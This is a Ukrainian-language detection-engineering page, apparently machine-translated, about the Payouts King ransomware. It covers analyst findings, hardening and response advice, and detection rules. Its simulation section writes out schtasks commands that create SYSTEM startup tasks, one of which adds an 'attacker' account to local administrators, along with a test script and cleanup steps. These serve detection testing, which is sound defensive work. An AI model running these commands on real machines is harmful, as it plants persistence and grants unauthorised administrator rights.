Володар Виплат Намагається Захопити Престол Зловмисного Програмного Забезпечення-Вимагача
Detection stack
- AIDR
- Alert
- ETL
- Query
Розслідування
ThreatLabz проаналізував кілька зразків програм-вимагачів, розкривши обернені функції CRC та FNV1, використовувані шкідливим ПЗ, і виявив стійкість через заплановані завдання. Дослідники також задокументували схему шифрування, цільові розширення файлів і загальний потік виконання. Їх аналіз показав вбудований список процесів, пов’язаних із безпекою, які програма-вимагач намагається зупинити за допомогою системних викликів низького рівня перед початком шифрування. Додаткові індикатори, включаючи параметри командного рядка та шаблони розширень файлів, були безпосередньо витягнуті зі зразків для підтримки виявлення та зусиль щодо пошуку.
Зміцнення
Організації повинні запровадити багатофакторну аутентифікацію, навчити користувачів розпізнавати спроби соціальної інженерії та контролювати підозріле використання таких інструментів, як Microsoft Teams та Quick Assist. Захисники також повинні блокувати відомі розширення файлів, пов’язаних з програмами-вимагачами, та розгортати виявлення кінцевих точок, здатних розпізнавати створення запланованих завдань у каталозі Mozilla, а також виклики до SetFileInformationByHandle з FileRenameInfo. Регулярні резервні копії необхідно регулярно підтримувати, а тіньові копії слід захищати для поліпшення варіантів відновлення у разі шифрування.
Відповідь
Якщо виявлено активність Payouts King, негайно ізолюйте уражену систему та зберіть як вміст пам’яті, так і образи диска для криміналістичного аналізу. Слідчі повинні переглянути заплановані завдання на наявність таких імен, як MozillaUpdateTask and MozillaElevateTask, а потім полювати на аргументи командного рядка, захищені митним CRC, і унікальні розширення зашифрованих файлів, пов’язаних зі шкідливим ПЗ. Відновлення повинно зосередитися на відновленні даних з перевірених чистих резервних копій. Команди безпеки повинні також надіслати виявлені хеши зразків на відповідні платформи розвідки загроз, щоб підтримати більш широкі трекінг і захист.
Потік атаки
Виявлення
Можливе використання Schtasks або AT для стійкості (через командний рядок)
Перегляд
Підозріла діяльність VSSADMIN (через командний рядок)
Перегляд
Індикатори компрометації (HashSha256) для виявлення: Payouts King прагне зайняти трон програм-вимагачів
Перегляд
Payouts King Ransomware Заплановане завдання для стійкості [Створення процесу Windows]
Перегляд
Виконання симуляції
Передумова: Телеметрія та перевірка попередньої бази має бути пройдена.
Пояснення: У цьому розділі детально описується точне виконання техніки противника (TTP), розробленої для спровокування правила виявлення. Команди і наративи ПОВИННІ безпосередньо відображати TTP-идентифікатор та прагнути створити саме ту ж телеметрію, яка очікується правилами виявлення. Абстрактні або не пов’язані приклади призведуть до помилкового діагнозу.
-
Атакувальний наратив та команди:
Нападник, отримавши початковий доступ, хоче забезпечити запуск програми-вимагача при кожному перезавантаженні системи та отримати привілеї SYSTEM. Вони використовують рідний
schtasks.exeбінарний файл, щоб уникнути додавання сторонніх інструментів. Спочатку вони створюють “UpdateTask”, яке запускає теоретичне навантаження програми-вимагача, а потім негайно створюють і запускають “ElevateTask”, який генерує процес з привілеєм для подальшого розвитків інфекційного ланцюга. Обидва завдання розміщені підMozillaпростором імен, щоб імітувати відомий патерн Payouts King.-
Створення UpdateTask:
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe" -
Створення ElevateTask:
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker" -
Виконання ElevateTask негайно:
schtasks.exe /run /tn MozillaElevateTask -
(Необов’язково) Перевірити наявність завдань:
schtasks.exe /query /tn Mozilla* /fo LIST /v
Ці точні командні рядки відповідають
вибірка1andвибірка2пункти правил Sigma, задовольняючиумову: вибірка1 та вибірка2 та не виключення. -
-
Скрипт регресійного тестування:
# Симуляція стійкості Payouts King з запланованих завдань # ------------------------------------------------- # Крок 1: Створіть UpdateTask (стійкість при завантаженні) schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe" # Крок 2: Створіть ElevateTask (помічник для підвищення привілеїв) schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker" # Крок 3: Запустіть ElevateTask негайно, щоб згенерувати другий події виявлення schtasks.exe /run /tn MozillaElevateTask # Крок 4: Виведення підтвердження (не вимагається для виявлення, для видимості оператора) Write-Host "Заплановані завдання створені і ElevateTask виконано." -
Команди очищення:
# Видалити завдання, створені для тесту schtasks.exe /delete /tn MozillaElevateTask /f schtasks.exe /delete /tn MozillaUpdateTask /f # Опціонально видалити фіктивне навантаження Remove-Item -Path "C:Temppayouts_king.exe" -ErrorAction SilentlyContinue